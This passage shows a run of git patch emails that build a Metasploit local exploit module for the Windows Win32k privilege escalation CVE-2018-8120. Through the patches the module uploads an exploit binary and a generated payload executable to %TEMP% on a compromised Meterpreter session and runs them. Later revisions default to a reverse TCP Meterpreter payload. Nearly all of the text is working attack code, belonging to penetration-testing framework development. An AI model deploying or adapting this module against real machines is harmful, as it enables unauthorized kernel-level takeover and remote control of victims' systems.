'bigric3', # Analysis and exploit 'Anton Cherepanov', # Vulnerability discovery 'Dhiraj Mishra ' # Metasploit module ], @@ -41,7 +42,7 @@ class MetasploitModule < Msf::Post register_options( [ - OptString.new('POCCMD', [true, 'The command to run from poc.sct']), + OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120']), ]) end @@ -55,22 +56,21 @@ class MetasploitModule < Msf::Post temprexe end - def write_file_to_target(temprexe,rexe) + def write_file_to_target(temprexe,rexe) fd = session.fs.file.new(temprexe, "wb") fd.write(rexe) fd.close end - def create_payload_from_file(exec) + def create_payload_from_file(exec) print_status("Reading Payload from file #{exec}") ::IO.read(exec) end - def run + def run rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" print_status("exe name is: #{rexename}") poccmd = datastore['POCCMD'] - cmdcheck = datastore['CMDCHECK'] rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') raw = create_payload_from_file rexe From 428e1594d578e4a6ff13c05f48a205960aa30528 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Thu, 20 Sep 2018 22:31:10 +0530 Subject: [PATCH 09/39] Updating --- .../escalate/ms18_8120_win32k_privsec.rb | 21 +++++++++---------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 88b3f12318..15ce061137 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -22,10 +22,10 @@ class MetasploitModule < Msf::Post [ ['BID', '104034'], ['CVE', '2018-8120'], - ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], - ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], ['URL', 'https://github.com/bigric3/cve-2018-8120'], - ['URL', 'https://github.com/unamer/CVE-2018-8120'] + ['URL', 'https://github.com/unamer/CVE-2018-8120'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'] ], 'Author' => [ @@ -42,18 +42,18 @@ class MetasploitModule < Msf::Post register_options( [ - OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120']), + OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), ]) end def write_exe_to_target(rexe, rexename) begin - print_warning("writing to %TEMP%") + print_warning("Writing file to temp") temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end - print_good("Persistent Script written to #{temprexe}") - temprexe + print_good("File path on remote system: #{temprexe}") + temprexe end def write_file_to_target(temprexe,rexe) @@ -63,20 +63,20 @@ class MetasploitModule < Msf::Post end def create_payload_from_file(exec) - print_status("Reading Payload from file #{exec}") + print_status("Reading file from: #{exec}") ::IO.read(exec) end def run rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - print_status("exe name is: #{rexename}") + print_status("EXE name is: #{rexename}") poccmd = datastore['POCCMD'] rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) - print_status('Starting module..') + print_status('Initiating module...') print_line command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename @@ -87,6 +87,5 @@ class MetasploitModule < Msf::Post command_output = cmd_exec(command) print_line(command_output) print_line - end end From 4fea65170c85348137d78b67963a8e2dd45bb261 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Thu, 20 Sep 2018 22:50:31 +0530 Subject: [PATCH 10/39] Updating --- .../escalate/ms18_8120_win32k_privsec.rb | 34 +++++++++---------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 15ce061137..3e96ea6354 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -48,7 +48,7 @@ class MetasploitModule < Msf::Post def write_exe_to_target(rexe, rexename) begin - print_warning("Writing file to temp") + print_status("Writing file to temp") temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end @@ -68,24 +68,24 @@ class MetasploitModule < Msf::Post end def run - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - print_status("EXE name is: #{rexename}") - poccmd = datastore['POCCMD'] + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + print_good("EXE name is: #{rexename}") + poccmd = datastore['POCCMD'] - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe - script_on_target = write_exe_to_target(raw, rexename) + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) - print_status('Initiating module...') - print_line + print_good('Initiating module...') + print_line - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - print_status("Location of CVE-2018-8120.exe is: #{command}") - command += " " - command += "#{poccmd}" - print_status("Executing command : #{command}") - command_output = cmd_exec(command) - print_line(command_output) - print_line + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + print_good("Location of CVE-2018-8120.exe is: #{command}") + command += " " + command += "#{poccmd}" + print_good("Executing command : #{command}") + command_output = cmd_exec(command) + print_line(command_output) + print_line end end From 4116e8e205b841e8e7e3c6439d37197710c77f9e Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Sat, 22 Sep 2018 01:00:44 +0530 Subject: [PATCH 11/39] Fixing --- modules/post/windows/escalate/ms18_8120_win32k_privsec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb index 3e96ea6354..82066052a9 100644 --- a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -82,8 +82,8 @@ class MetasploitModule < Msf::Post command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename print_good("Location of CVE-2018-8120.exe is: #{command}") command += " " - command += "#{poccmd}" - print_good("Executing command : #{command}") + command += "\"#{poccmd}\"" + print_good("Executing command: #{command}") command_output = cmd_exec(command) print_line(command_output) print_line From 25ed5dc3a6731a7bd2a907aca70223b9117b2e6f Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Sat, 22 Sep 2018 15:22:30 +0530 Subject: [PATCH 12/39] Moving to exploits/windows/local --- .../windows/local/ms18_8120_win32k_privsec.rb | 91 +++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 modules/exploits/windows/local/ms18_8120_win32k_privsec.rb diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb new file mode 100644 index 0000000000..82066052a9 --- /dev/null +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -0,0 +1,91 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + Rank = GoodRanking + + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', + 'Description' => %q{ + This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 + when the Win32k component fails to properly handle objects in memory. An attacker who + successfully exploited this vulnerability could run arbitrary code in kernel mode. An + attacker could then install programs; view, change, or delete data; or create new + accounts with full user rights.}, + 'References' => + [ + ['BID', '104034'], + ['CVE', '2018-8120'], + ['URL', 'https://github.com/bigric3/cve-2018-8120'], + ['URL', 'https://github.com/unamer/CVE-2018-8120'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'] + ], + 'Author' => + [ + 'unamer', # Exploit PoC + 'bigric3', # Analysis and exploit + 'Anton Cherepanov', # Vulnerability discovery + 'Dhiraj Mishra ' # Metasploit module + ], + 'DisclosureDate' => 'May 9 2018', + 'Arch' => [ARCH_X64, ARCH_X86], + 'SessionTypes' => ['meterpreter'], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), + ]) + end + + def write_exe_to_target(rexe, rexename) + begin + print_status("Writing file to temp") + temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + write_file_to_target(temprexe,rexe) + end + print_good("File path on remote system: #{temprexe}") + temprexe + end + + def write_file_to_target(temprexe,rexe) + fd = session.fs.file.new(temprexe, "wb") + fd.write(rexe) + fd.close + end + + def create_payload_from_file(exec) + print_status("Reading file from: #{exec}") + ::IO.read(exec) + end + + def run + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + print_good("EXE name is: #{rexename}") + poccmd = datastore['POCCMD'] + + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) + + print_good('Initiating module...') + print_line + + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + print_good("Location of CVE-2018-8120.exe is: #{command}") + command += " " + command += "\"#{poccmd}\"" + print_good("Executing command: #{command}") + command_output = cmd_exec(command) + print_line(command_output) + print_line + end +end From db15340306783b76136b1d599497f372d69a9009 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Sat, 22 Sep 2018 15:30:51 +0530 Subject: [PATCH 13/39] Fixing --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 82066052a9..f6a8fafd54 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class MetasploitModule < Msf::Post +class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File From 783789d098840397059c85bb7a1347a870315ee8 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Thu, 4 Oct 2018 15:01:06 +0530 Subject: [PATCH 14/39] Updating --- .../windows/local/ms18_8120_win32k_privsec.rb | 81 ++++++++++++------- 1 file changed, 54 insertions(+), 27 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index f6a8fafd54..bb5c871269 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -3,11 +3,16 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +require 'msf/core/exploit/exe' + class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking + include Msf::Post::Common include Msf::Post::File - include Msf::Post::Windows::Registry + include Msf::Post::Windows::Priv + include Msf::Exploit::EXE + include Msf::Post::Windows::Process def initialize(info = {}) super(update_info(info, @@ -35,25 +40,36 @@ class MetasploitModule < Msf::Exploit::Local 'Dhiraj Mishra ' # Metasploit module ], 'DisclosureDate' => 'May 9 2018', - 'Arch' => [ARCH_X64, ARCH_X86], - 'SessionTypes' => ['meterpreter'], - 'License' => MSF_LICENSE + 'Arch' => [ARCH_X64], + 'Platform' => 'win', + 'Payload' => + { + 'Space' => 4096, + 'DisableNops'=> true + }, + 'Targets' => + [ + ['Windows 7 x64', { 'Arch' => ARCH_X64 }] + ], + 'SessionTypes' => ['meterpreter'], + 'DefaultTarget' => 0, + 'License' => MSF_LICENSE )) register_options( [ - OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), + OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ]) ]) end def write_exe_to_target(rexe, rexename) begin - print_status("Writing file to temp") + vprint_warning("writing to %TEMP%") temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end - print_good("File path on remote system: #{temprexe}") - temprexe + vprint_good("File path: #{temprexe}") + temprexe end def write_file_to_target(temprexe,rexe) @@ -63,29 +79,40 @@ class MetasploitModule < Msf::Exploit::Local end def create_payload_from_file(exec) - print_status("Reading file from: #{exec}") + vprint_status("Reading Payload from file #{exec}") ::IO.read(exec) end + + def exploit + @payload_name = datastore['PAYLOAD'] + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + vprint_status("exe name is: #{rexename}") + + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) + + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + vprint_status("Location of CVE-2018-8120.exe is: #{command}") - def run - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - print_good("EXE name is: #{rexename}") - poccmd = datastore['POCCMD'] + command += " " + command += "#{cmd}" - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe - script_on_target = write_exe_to_target(raw, rexename) + vprint_status("Executing command : #{command}") + command_output = cmd_exec(command) + print_line(command_output) + print_line('') - print_good('Initiating module...') - print_line - - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - print_good("Location of CVE-2018-8120.exe is: #{command}") - command += " " - command += "\"#{poccmd}\"" - print_good("Executing command: #{command}") - command_output = cmd_exec(command) - print_line(command_output) - print_line end + attr_reader :payload_name + attr_reader :payload_exe + attr_reader :payload_path end From 9f8f0b8885bb9a6ffffc5011f854ac0b25b46b9c Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Thu, 4 Oct 2018 15:41:46 +0530 Subject: [PATCH 15/39] Fixing carriage/spaces return at EOL --- .../windows/local/ms18_8120_win32k_privsec.rb | 41 ++++++++----------- 1 file changed, 18 insertions(+), 23 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index bb5c871269..38d1b50bb1 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -40,16 +40,16 @@ class MetasploitModule < Msf::Exploit::Local 'Dhiraj Mishra ' # Metasploit module ], 'DisclosureDate' => 'May 9 2018', - 'Arch' => [ARCH_X64], - 'Platform' => 'win', - 'Payload' => + 'Arch' => [ARCH_X64], + 'Platform' => 'win', + 'Payload' => { 'Space' => 4096, 'DisableNops'=> true }, - 'Targets' => + 'Targets' => [ - ['Windows 7 x64', { 'Arch' => ARCH_X64 }] + ['Windows 7 x64', {'Arch' => ARCH_X64 }] ], 'SessionTypes' => ['meterpreter'], 'DefaultTarget' => 0, @@ -82,37 +82,32 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("Reading Payload from file #{exec}") ::IO.read(exec) end - + def exploit - @payload_name = datastore['PAYLOAD'] - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - vprint_status("exe name is: #{rexename}") - - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - + @payload_name = datastore['PAYLOAD'] + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + vprint_status("exe name is: #{rexename}") + + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename vprint_status("Location of CVE-2018-8120.exe is: #{command}") command += " " command += "#{cmd}" - vprint_status("Executing command : #{command}") command_output = cmd_exec(command) print_line(command_output) print_line('') end - attr_reader :payload_name - attr_reader :payload_exe - attr_reader :payload_path end From da525db6e976066faacb9c57e9649b70b10f404e Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Sun, 7 Oct 2018 01:54:20 +0530 Subject: [PATCH 16/39] Updating --- .../windows/local/ms18_8120_win32k_privsec.rb | 43 ++++++++++++------- 1 file changed, 27 insertions(+), 16 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 38d1b50bb1..0980a9fdf3 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -62,9 +62,24 @@ class MetasploitModule < Msf::Exploit::Local ]) end + def validate_target + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') + end + + if sysinfo['OS'] =~ /XP/ + fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') + end + end + def write_exe_to_target(rexe, rexename) begin - vprint_warning("writing to %TEMP%") + vprint_warning("Writing file to %TEMP%") + print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end @@ -79,24 +94,22 @@ class MetasploitModule < Msf::Exploit::Local end def create_payload_from_file(exec) - vprint_status("Reading Payload from file #{exec}") + vprint_status("Reading payload from file #{exec}") ::IO.read(exec) end def exploit @payload_name = datastore['PAYLOAD'] - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - vprint_status("exe name is: #{rexename}") - + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + vprint_status("EXE's name is: #{rexename}") exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename @@ -106,8 +119,6 @@ class MetasploitModule < Msf::Exploit::Local command += "#{cmd}" vprint_status("Executing command : #{command}") command_output = cmd_exec(command) - print_line(command_output) - print_line('') - + print_good(command_output) end end From b08c5ad5974c16c7ad6d10b675ea0c254bf4e17c Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Mon, 8 Oct 2018 13:24:48 +0530 Subject: [PATCH 17/39] Adding DefaultOptions --- .../windows/local/ms18_8120_win32k_privsec.rb | 91 +++++++++---------- 1 file changed, 44 insertions(+), 47 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 0980a9fdf3..193fabda06 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -14,53 +14,48 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Windows::Process - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', - 'Description' => %q{ +def initialize(info={}) + super(update_info(info, { + 'Name' => 'Windows ClientCopyImage Win32k Exploit', + 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new - accounts with full user rights.}, - 'References' => - [ - ['BID', '104034'], - ['CVE', '2018-8120'], - ['URL', 'https://github.com/bigric3/cve-2018-8120'], - ['URL', 'https://github.com/unamer/CVE-2018-8120'], - ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], - ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'] - ], - 'Author' => - [ + accounts with full user rights. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'unamer', # Exploit PoC 'bigric3', # Analysis and exploit 'Anton Cherepanov', # Vulnerability discovery 'Dhiraj Mishra ' # Metasploit module ], - 'DisclosureDate' => 'May 9 2018', - 'Arch' => [ARCH_X64], - 'Platform' => 'win', - 'Payload' => - { - 'Space' => 4096, - 'DisableNops'=> true + 'Arch' => [ ARCH_X64 ], + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => { + 'EXITFUNC' => 'thread', + 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }, - 'Targets' => - [ - ['Windows 7 x64', {'Arch' => ARCH_X64 }] + 'Targets' => [ + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], - 'SessionTypes' => ['meterpreter'], - 'DefaultTarget' => 0, - 'License' => MSF_LICENSE - )) - - register_options( - [ - OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ]) - ]) - end + 'Payload' => { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => [ + ['BID', '104034'], + ['CVE', '2018-8120'], + ['URL', 'https://github.com/unamer/CVE-2018-8120'], + ['URL', 'https://github.com/bigric3/cve-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'] + ], + 'DisclosureDate' => 'May 9 2018', + 'DefaultTarget' => 0 + })) def validate_target if is_system? @@ -79,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Local def write_exe_to_target(rexe, rexename) begin vprint_warning("Writing file to %TEMP%") - print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") - temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") + temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end vprint_good("File path: #{temprexe}") @@ -89,13 +84,13 @@ class MetasploitModule < Msf::Exploit::Local def write_file_to_target(temprexe,rexe) fd = session.fs.file.new(temprexe, "wb") - fd.write(rexe) + fd.write(rexe) fd.close end def create_payload_from_file(exec) vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) + ::IO.read(exec) end def exploit @@ -108,17 +103,19 @@ class MetasploitModule < Msf::Exploit::Local cmd = tempdir + "\\" + tempexename + ".exe" vprint_status("Preparing payload at #{cmd}") write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename vprint_status("Location of CVE-2018-8120.exe is: #{command}") command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - command_output = cmd_exec(command) - print_good(command_output) + command += "#{cmd}" + vprint_status("Executing command : #{command}") + command_output = cmd_exec(command) + print_status(command_output) + print_good('Exploit finished, wait for privileged payload execution to complete.') + end end end From 097e9b8bfe7f2805b776868e9c4b55e6572f4d07 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Mon, 8 Oct 2018 14:48:05 +0530 Subject: [PATCH 18/39] Indentation --- .../windows/local/ms18_8120_win32k_privsec.rb | 70 +++++++++---------- 1 file changed, 35 insertions(+), 35 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 193fabda06..67712b79ed 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -71,51 +71,51 @@ def initialize(info={}) end end - def write_exe_to_target(rexe, rexename) - begin - vprint_warning("Writing file to %TEMP%") - print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") - temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - write_file_to_target(temprexe,rexe) - end + + def write_exe_to_target(rexe, rexename) + begin + vprint_warning("Writing file to %TEMP%") + print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") + temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + write_file_to_target(temprexe,rexe) + end vprint_good("File path: #{temprexe}") temprexe - end + end def write_file_to_target(temprexe,rexe) - fd = session.fs.file.new(temprexe, "wb") - fd.write(rexe) - fd.close - end + fd = session.fs.file.new(temprexe, "wb") + fd.write(rexe) + fd.close + end def create_payload_from_file(exec) vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) + ::IO.read(exec) end - def exploit + def exploit @payload_name = datastore['PAYLOAD'] rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - vprint_status("EXE's name is: #{rexename}") - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe - script_on_target = write_exe_to_target(raw, rexename) - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - vprint_status("Location of CVE-2018-8120.exe is: #{command}") - - command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - command_output = cmd_exec(command) - print_status(command_output) - print_good('Exploit finished, wait for privileged payload execution to complete.') - end + vprint_status("EXE's name is: #{rexename}") + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + vprint_status("Location of CVE-2018-8120.exe is: #{command}") + command += " " + command += "#{cmd}" + vprint_status("Executing command : #{command}") + command_output = cmd_exec(command) + print_status(command_output) + print_good('Exploit finished, wait for privileged payload execution to complete.') end + end end From 56a39545c628056169514e804d0edc883cfc3a45 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Mon, 8 Oct 2018 16:40:19 +0530 Subject: [PATCH 19/39] Updating --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 67712b79ed..2251250f54 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'Windows ClientCopyImage Win32k Exploit', + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who From e2f9fb5d8e6999b873092984c78083d33eea152b Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 9 Oct 2018 12:52:34 +0530 Subject: [PATCH 20/39] Updating Indentation --- .../windows/local/ms18_8120_win32k_privsec.rb | 44 ++++++++++--------- 1 file changed, 23 insertions(+), 21 deletions(-) diff --git 